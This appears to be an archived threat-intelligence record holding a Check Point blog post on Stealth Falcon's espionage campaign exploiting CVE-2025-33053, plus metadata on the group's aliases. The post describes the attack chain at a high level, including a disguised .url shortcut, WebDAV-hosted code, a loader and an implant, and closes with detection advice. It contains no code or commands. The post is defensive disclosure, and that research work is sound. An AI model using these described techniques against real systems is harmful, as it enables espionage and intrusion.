{
	"id": "ec731c39-5dc4-448c-b3c6-175487ae3fa5",
	"created_at": "2026-04-06T03:36:42.417575Z",
	"updated_at": "2026-04-10T03:25:36.512248Z",
	"deleted_at": null,
	"sha1_hash": "e3e73abbc8fb87df552c21a40867605d32ab0397",
	"title": "Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 59211,
	"plain_text": "Inside Stealth Falcon’s Espionage Campaign Using a Microsoft\r\nZero-Day\r\nBy bferrite\r\nPublished: 2025-06-10 · Archived: 2026-04-06 02:58:43 UTC\r\nInside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day\r\nCheck Point Research (CPR) identified a previously unknown Windows vulnerability (CVE-2025-33053)\r\nbeing actively exploited in the wild.\r\nFollowing CPR’s responsible disclosure, Microsoft released a patch on its June 10th Patch Tuesday\r\nThe zero-day was used in a targeted espionage operation likely conducted by Stealth Falcon, a threat group\r\nknown to target entities in the Middle East and Africa.\r\nThe attack chain begins with a deceptive internet shortcut (.url file) that silently triggers malware hosted on\r\nan attacker-controlled WebDAV server, abusing legitimate Windows tools in the process.\r\nThe operation deployed a sophisticated custom loader and implant designed to evade detection, hinder\r\nanalysis, and selectively activate only on valuable targets.\r\nThe operation deployed a sophisticated custom loader and implant designed to evade detection, hinder analysis,\r\nand selectively activate only on valuable targets. In March 2025, Check Point Research uncovered an attempted\r\ncyber attack against a major defense organization in Turkey. The attackers used a previously unknown remote\r\ncode execution vulnerability in Windows to execute files from a remote WebDAV server they controlled,\r\nexploiting a legitimate built-in Windows tool to run malicious code silently. Following responsible disclosure,\r\nMicrosoft assigned the vulnerability CVE-2025-33053 and released a patch on June 10, 2025, as part of their\r\nmonthly Patch Tuesday updates.\r\nBased on the techniques used, the infrastructure behind the campaign, and the profile of the intended target, Check\r\nPoint Research attributes this activity to the well-established APT group known as Stealth Falcon.\r\nIn this blog, we break down how the group leveraged CVE-2025-33053 to deliver a custom-built implant known\r\nas Horus Agent, part of a broader toolset designed for espionage. We’ll also explore the implications of this\r\ncampaign for defenders, especially those protecting government, defense, and critical infrastructure organizations.\r\nFor an in-depth understanding of Sealth Falcon’s campaign, read Check Point Research’s comprehensive report\r\nhere.\r\nWho Is Stealth Falcon?\r\nStealth Falcon, also known by the alias FruityArmor, is a long-running cyber espionage group active since at least\r\n2012, with a track record of targeting political and strategic entities across the Middle East and Africa. Over time,\r\nStealth Falcon’s tactics have evolved, but their focus remains on high-value targets in government and defense\r\nhttps://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/\r\nPage 1 of 4\n\nsectors. Today, Stealth Falcon is known for its use of zero-day exploits, custom malware, and delivery\r\nmechanisms, all hallmarks of a well-resourced APT.\r\nHow the Attack Worked\r\nThe attack began with what looked like a standard shortcut file — a .url file disguised as a PDF document related\r\nto military equipment damage. Submitted to VirusTotal by a source associated with a major Turkish defense\r\ncompany, the file was likely delivered via a phishing email, a tactic Stealth Falcon has used many times before.\r\nWhat made this shortcut file dangerous was its ability to silently run code from a remote server controlled by the\r\nattackers.  The attackers manipulated the Windows file execution search order. They tricked a built-in Windows\r\nutility into executing a malicious program hosted on their remote server.\r\nThis technique allowed Stealth Falcon to run their code without needing to drop files on the first stage of the\r\ninfection chain directly onto the victim’s computer. It also helped them evade detection by relying on legitimate,\r\ntrusted Windows components to carry out the attack.\r\nThe infection chain.\r\nHorus Loader: A Customized Entry Point for Espionage\r\nOnce the shortcut file was activated, it kicked off the next phase of the attack: a multi-stage loader we called\r\nHorus Loader, named after the Egyptian falcon god, echoing the group’s codename.\r\nHorus Loader is built to be flexible and evasive. It can:\r\nClean up traces left by earlier parts of the infection chain\r\nBypass basic detection mechanisms\r\nDrop and open a decoy document to avoid suspicion\r\nDeploy the final spyware payload discreetly\r\nThe Final Act: Delivering Horus Agent\r\nWhile the victim is occupied with viewing the decoy document, the malware continues its work quietly in the\r\nbackground. What follows is one of the most technically advanced stages of the operation: the deployment of a\r\ncustom-built espionage tool known as Horus Agent.\r\nCustom-Built Backdoor: Horus Agent\r\nhttps://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/\r\nPage 2 of 4\n\nThe final payload is Horus Agent, a private implant built for Mythic, a legitimate open-source command-and-control (C2) framework commonly used in red team operations.\r\nUnlike off-the-shelf malware, Horus is written in C++ and built from the ground up with stealth and flexibility in\r\nmind. It shares only basic traits with other known Mythic agents — enough to function on the platform, but not\r\nenough to be easily detected or attributed based on code similarities.\r\nOnce installed, the Horus Agent connects to its C2 server and begins polling for instructions using the Mythic\r\nframework. While some commands are built-in, Stealth Falcon also developed several custom ones tailored for\r\nstealth and flexibility, showing intent for gathering intelligence quietly and executing payloads with minimal\r\ndetection.\r\nUnlike earlier modified Mythic agents, Horus appears custom-built. It emphasizes stealth, anti-analysis\r\nprotections, and a minimal command set, focused on fingerprinting targets and selectively deploying further\r\npayloads. This streamlined design suggests deep awareness of both target environments and defensive tools,\r\nhelping the group stay under the radar while protecting their broader toolset.\r\nConclusion: A Zero-Day Attack with Strategic Implications\r\nStealth Falcon continues to evolve, combining zero-day exploitation CVE-2025-33053 and legitimate tools, multi-stage loaders, and custom-built implants in a resilient campaign. Their creative abuse of WebDAV and Windows\r\nworking directory behavior highlights how even small misconfigurations or overlooked features can be\r\nweaponized.\r\nMitigation and Defense\r\nThis attack highlights the importance of proactive threat detection, visibility into system behavior, and real-time\r\nprotection. For organizations in sectors like defense, government, or critical infrastructure, it’s a reminder that\r\ntargeted threats are an ongoing concern. Given the nature of this vulnerability and its connection to core Windows\r\nAPI behavior, it may impact a broad range of Windows versions.\r\nTo determine if your environment has been breached, we suggest examining your logs and monitoring systems for\r\nthe following:\r\nEmails with archive attachments including a seemingly harmless URL or LNK file.\r\nUnusual or unidentified connections to WebDAV servers launched by default Windows processes.\r\nUpon discovering the vulnerability, Check Point quickly developed and deployed protections to keep customers\r\nsecure well before the issue became public. Our Intrusion Prevention System, Threat Emulation, and Harmony\r\nEndpoint solutions now detect and block exploitation attempts targeting this flaw. Check Point Research continues\r\nto monitor global telemetry to track any new activity and provide timely updates as the threat landscape evolves.\r\nFor an in-depth understanding of Sealth Falcon’s campaign, read Check Point Research’s comprehensive report\r\nhere.\r\nhttps://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/\r\nPage 3 of 4\n\nSource: https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/\r\nhttps://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/"
	],
	"report_names": [
		"inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day"
	],
	"threat_actors": [
		{
			"id": "0f47a6f3-a181-4e15-9261-50eef5f03a3a",
			"created_at": "2022-10-25T16:07:24.228663Z",
			"updated_at": "2026-04-10T02:00:04.905195Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"FruityArmor",
				"G0038",
				"Project Raven",
				"Stealth Falcon"
			],
			"source_name": "ETDA:Stealth Falcon",
			"tools": [
				"Deadglyph",
				"StealthFalcon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "77aedfa3-e52b-4168-8269-55ccec0946f7",
			"created_at": "2023-01-06T13:46:38.453791Z",
			"updated_at": "2026-04-10T02:00:02.981559Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"FruityArmor",
				"G0038"
			],
			"source_name": "MISPGALAXY:Stealth Falcon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bd084d2f-4233-49b1-b0e6-c7011178dae0",
			"created_at": "2022-10-25T15:50:23.544316Z",
			"updated_at": "2026-04-10T02:00:05.325921Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"Stealth Falcon"
			],
			"source_name": "MITRE:Stealth Falcon",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775446602,
	"ts_updated_at": 1775791536,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e3e73abbc8fb87df552c21a40867605d32ab0397.pdf",
		"text": "https://archive.orkl.eu/e3e73abbc8fb87df552c21a40867605d32ab0397.txt",
		"img": "https://archive.orkl.eu/e3e73abbc8fb87df552c21a40867605d32ab0397.jpg"
	}
}